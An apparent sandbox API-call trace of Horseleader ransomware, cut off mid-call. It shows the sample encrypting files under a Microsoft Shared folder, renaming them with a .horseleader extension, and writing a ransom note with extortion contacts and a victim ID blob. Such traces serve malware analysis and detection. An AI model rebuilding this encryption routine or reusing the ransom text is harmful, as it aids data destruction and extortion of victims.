[0245.491] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0245.491] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeee1cd90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xef058230, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xef058230, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3d46b48d, dwReserved1=0x38a709c6, cFileName="..", cAlternateFileName="")) returned 1 [0245.491] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0245.491] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\..") returned 68 [0245.491] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0245.491] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0245.491] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc52bb100, ftCreationTime.dwHighDateTime=0x1ca6185, ftLastAccessTime.dwLowDateTime=0xeee1cd90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xc52bb100, ftLastWriteTime.dwHighDateTime=0x1ca6185, nFileSizeHigh=0x0, nFileSizeLow=0x2cc7, dwReserved0=0x3d46b48d, dwReserved1=0x38a709c6, cFileName="MCABOUT.HTM", cAlternateFileName="")) returned 1 [0245.491] lstrcmpiW (lpString1="MCABOUT.HTM", lpString2="Windows") returned -1 [0245.491] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM") returned 77 [0245.491] StrStrIW (lpFirst="MCABOUT.HTM", lpSrch=".horseleader") returned 0x0 [0245.491] lstrcmpW (lpString1="MCABOUT.HTM", lpString2="#Decrypt#.txt") returned 1 [0245.491] lstrcmpW (lpString1="MCABOUT.HTM", lpString2="_uninstalling_.png") returned 1 [0245.491] lstrlenW (lpString=".testttjffg") returned 11 [0245.491] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM", lpSrch=".testttjffg") returned 0x0 [0245.491] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0245.492] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0245.492] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\1033\\mcabout.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0245.492] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM") returned 77 [0245.492] StrStrW (lpFirst="MCABOUT.HTM", lpSrch=".txt") returned 0x0 [0245.492] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=11463) returned 1 [0245.493] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x2cc7, lpOverlapped=0x0) returned 1 [0245.494] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffd339, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.494] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x2cc7, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x2cc7, lpOverlapped=0x0) returned 1 [0245.495] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.495] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0245.495] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0245.495] CloseHandle (hObject=0x1a4) returned 1 [0245.495] GetProcessHeap () returned 0x780000 [0245.495] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0245.495] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM.horseleader") returned 89 [0245.495] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\1033\\mcabout.htm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\1033\\mcabout.htm.horseleader")) returned 1 [0245.496] GetProcessHeap () returned 0x780000 [0245.496] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0245.496] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b89b100, ftCreationTime.dwHighDateTime=0x1caac21, ftLastAccessTime.dwLowDateTime=0xef058230, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x7b89b100, ftLastWriteTime.dwHighDateTime=0x1caac21, nFileSizeHigh=0x0, nFileSizeLow=0x4380, dwReserved0=0x3d46b48d, dwReserved1=0x38a709c6, cFileName="STINTL.DLL", cAlternateFileName="")) returned 1 [0245.496] lstrcmpiW (lpString1="STINTL.DLL", lpString2="Windows") returned -1 [0245.496] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\STINTL.DLL") returned 76 [0245.496] StrStrIW (lpFirst="STINTL.DLL", lpSrch=".horseleader") returned 0x0 [0245.496] lstrcmpW (lpString1="STINTL.DLL", lpString2="#Decrypt#.txt") returned 1 [0245.496] lstrcmpW (lpString1="STINTL.DLL", lpString2="_uninstalling_.png") returned 1 [0245.496] lstrlenW (lpString=".testttjffg") returned 11 [0245.496] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\STINTL.DLL", lpSrch=".testttjffg") returned 0x0 [0245.496] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0245.496] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0245.497] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\STINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\1033\\stintl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0245.498] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\STINTL.DLL") returned 76 [0245.498] StrStrW (lpFirst="STINTL.DLL", lpSrch=".txt") returned 0x0 [0245.498] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=17280) returned 1 [0245.498] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x4380, lpOverlapped=0x0) returned 1 [0245.500] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffbc80, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.500] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x4380, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x4380, lpOverlapped=0x0) returned 1 [0245.500] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.501] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0245.501] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0245.501] CloseHandle (hObject=0x1a4) returned 1 [0245.501] GetProcessHeap () returned 0x780000 [0245.501] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0245.501] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\STINTL.DLL.horseleader") returned 88 [0245.501] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\STINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\1033\\stintl.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\STINTL.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\1033\\stintl.dll.horseleader")) returned 1 [0245.504] GetProcessHeap () returned 0x780000 [0245.504] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0245.504] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc65b900, ftCreationTime.dwHighDateTime=0x1caac22, ftLastAccessTime.dwLowDateTime=0xef058230, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xdc65b900, ftLastWriteTime.dwHighDateTime=0x1caac22, nFileSizeHigh=0x0, nFileSizeLow=0x3580, dwReserved0=0x3d46b48d, dwReserved1=0x38a709c6, cFileName="STINTL.DLL.IDX_DLL", cAlternateFileName="STINTL~1.IDX")) returned 1 [0245.504] lstrcmpiW (lpString1="STINTL.DLL.IDX_DLL", lpString2="Windows") returned -1 [0245.504] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\STINTL.DLL.IDX_DLL") returned 84 [0245.504] StrStrIW (lpFirst="STINTL.DLL.IDX_DLL", lpSrch=".horseleader") returned 0x0 [0245.504] lstrcmpW (lpString1="STINTL.DLL.IDX_DLL", lpString2="#Decrypt#.txt") returned 1 [0245.504] lstrcmpW (lpString1="STINTL.DLL.IDX_DLL", lpString2="_uninstalling_.png") returned 1 [0245.504] lstrlenW (lpString=".testttjffg") returned 11 [0245.504] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\STINTL.DLL.IDX_DLL", lpSrch=".testttjffg") returned 0x0 [0245.504] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0245.504] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0245.504] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\STINTL.DLL.IDX_DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\1033\\stintl.dll.idx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0245.505] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\STINTL.DLL.IDX_DLL") returned 84 [0245.505] StrStrW (lpFirst="STINTL.DLL.IDX_DLL", lpSrch=".txt") returned 0x0 [0245.505] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=13696) returned 1 [0245.505] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x3580, lpOverlapped=0x0) returned 1 [0245.508] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffca80, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.508] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x3580, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x3580, lpOverlapped=0x0) returned 1 [0245.508] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.508] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0245.508] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0245.509] CloseHandle (hObject=0x1a4) returned 1 [0245.509] GetProcessHeap () returned 0x780000 [0245.509] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0245.509] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\STINTL.DLL.IDX_DLL.horseleader") returned 96 [0245.509] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\STINTL.DLL.IDX_DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\1033\\stintl.dll.idx_dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\STINTL.DLL.IDX_DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\1033\\stintl.dll.idx_dll.horseleader")) returned 1 [0245.510] GetProcessHeap () returned 0x780000 [0245.510] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0245.510] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc65b900, ftCreationTime.dwHighDateTime=0x1caac22, ftLastAccessTime.dwLowDateTime=0xef058230, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xdc65b900, ftLastWriteTime.dwHighDateTime=0x1caac22, nFileSizeHigh=0x0, nFileSizeLow=0x3580, dwReserved0=0x3d46b48d, dwReserved1=0x38a709c6, cFileName="STINTL.DLL.IDX_DLL", cAlternateFileName="STINTL~1.IDX")) returned 0 [0245.510] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0245.510] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\#Decrypt#.txt") returned 79 [0245.510] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\1033\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0245.510] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0245.510] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0245.511] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0245.512] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0245.512] CloseHandle (hObject=0x158) returned 1 [0245.512] GetProcessHeap () returned 0x780000 [0245.512] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0245.512] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b89b100, ftCreationTime.dwHighDateTime=0x1caac21, ftLastAccessTime.dwLowDateTime=0x5226a510, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7b89b100, ftLastWriteTime.dwHighDateTime=0x1caac21, nFileSizeHigh=0x0, nFileSizeLow=0x1e380, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="FBIBLIO.DLL", cAlternateFileName="")) returned 1 [0245.512] lstrcmpiW (lpString1="FBIBLIO.DLL", lpString2="Windows") returned -1 [0245.512] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FBIBLIO.DLL") returned 72 [0245.512] StrStrIW (lpFirst="FBIBLIO.DLL", lpSrch=".horseleader") returned 0x0 [0245.512] lstrcmpW (lpString1="FBIBLIO.DLL", lpString2="#Decrypt#.txt") returned 1 [0245.512] lstrcmpW (lpString1="FBIBLIO.DLL", lpString2="_uninstalling_.png") returned 1 [0245.512] lstrlenW (lpString=".testttjffg") returned 11 [0245.512] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FBIBLIO.DLL", lpSrch=".testttjffg") returned 0x0 [0245.512] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.512] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.512] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FBIBLIO.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\fbiblio.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0245.514] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FBIBLIO.DLL") returned 72 [0245.514] StrStrW (lpFirst="FBIBLIO.DLL", lpSrch=".txt") returned 0x0 [0245.514] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=123776) returned 1 [0245.514] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.514] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.520] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.520] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.520] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xc9c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.520] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.521] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.521] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.521] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x19380, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.521] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.522] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.522] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.522] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.522] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, 